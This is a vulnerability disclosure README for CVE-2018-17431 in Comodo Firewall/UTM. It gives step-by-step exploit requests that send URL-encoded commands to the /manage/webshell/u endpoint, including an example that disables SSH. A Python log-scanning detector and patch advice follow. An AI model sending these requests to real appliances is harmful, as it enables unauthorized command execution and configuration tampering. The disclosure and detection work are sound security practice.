https://github.com/Fadavvi/CVE-2018-17431-PoC

Proof of concept for CVE-2018-17431

comodo cve cve-2018-17431 exploit poc proof-of-concept rce remote-code-execution


## CVE-2018-17431-PoC
Proof of concept for CVE-2018-17431

### Exploit Title: Comodo Firewall & Central Manager (UTM) All Releases before 2.7.0 & 1.5.0 Remote Command Execution (Web Shell based)
### Exploit Author: Milad Fadavvi
### Vendor Homepage: https://www.comodo.com/
### Software Link: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276
### Version: before 2.7.0 & 1.5.0
### Tested on: Windows: Firefox/Chrome - Kali: Firefox
### Discovery Date: 2018-08-15 (reported the same day)
### Confirmation that the bug exists: 2018-09-22 ([Ticket ID: XWR-503-79437](https://github.com/Fadavvi/CVE-2018-17431-PoC/blob/master/Comodo-Confirmarion.png))
### Patch released: 2018-11-23 [Release Notes from Comodo](https://github.com/Fadavvi/CVE-2018-17431-PoC/raw/master/DomeFW2.7.0.ReleaseNote.pdf)

Exploit:

1. WebShell simulation:

For example, disabling SSH in the web shell looks like this:
- service [hit enter]
- ssh [hit enter]
- disable [hit enter]

2. Encode

URL-encode the above sequence
(I used the Burp encoder plugin)

%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a

3. Run

Base URL: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Encoded_Command]&l=[Integer]&_=1534440840152


https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (an extra Enter key to run the command)

Example: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152

https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152

A page with the **"Configuration has been altered"** message will show up and the configuration is changed!

### With this technique, we can simulate all WebShell commands.
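
For defenders, one way to find this request pattern in web access logs is to decode the `k` parameter of every request to the web shell endpoint and flag requests that carry whole typed lines. This is an added example, not part of the original README; the combined log format, the sample lines and the "whole line in one request" heuristic are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

WEBSHELL_PATH = "/manage/webshell/u"  # endpoint named in the README
REQUEST_RE = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines; combined log format is an assumption.
SAMPLE_LOG = """\
198.51.100.7 - - [16/Aug/2018:17:34:00 +0000] "GET /manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152 HTTP/1.1" 200 512
198.51.100.7 - - [16/Aug/2018:17:34:01 +0000] "GET /manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152 HTTP/1.1" 200 498
192.0.2.15 - - [16/Aug/2018:17:40:12 +0000] "GET /manage/webshell/u?s=9&w=100&h=24&k=s&l=3&_=1534441212000 HTTP/1.1" 200 120
192.0.2.15 - - [16/Aug/2018:17:40:13 +0000] "GET /manage/dashboard HTTP/1.1" 200 9041
"""


def webshell_keystrokes(line):
    """Return (source, decoded k value) for a web shell request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path != WEBSHELL_PATH:
        return None
    # parse_qs percent-decodes the value, so %0a becomes a newline.
    k = parse_qs(url.query, keep_blank_values=True).get("k", [""])[0]
    return m.group("src"), k


def scan(log_text):
    """Flag requests whose single k value carries complete typed lines."""
    findings = []
    for line in log_text.splitlines():
        hit = webshell_keystrokes(line)
        if hit is None:
            continue
        src, keys = hit
        commands = [c for c in re.split(r"[\r\n]", keys) if c]
        # Heuristic (assumption): interactive use sends a key or two per
        # request, so text plus its newline in one request looks scripted.
        if commands and re.search(r"[\r\n]", keys):
            findings.append({"source": src, "commands": commands})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["source"], "->", " / ".join(finding["commands"]))
```

A finding on a release before 2.7.0 & 1.5.0 is a reason to review the appliance configuration for changes and to move to the patched release listed above.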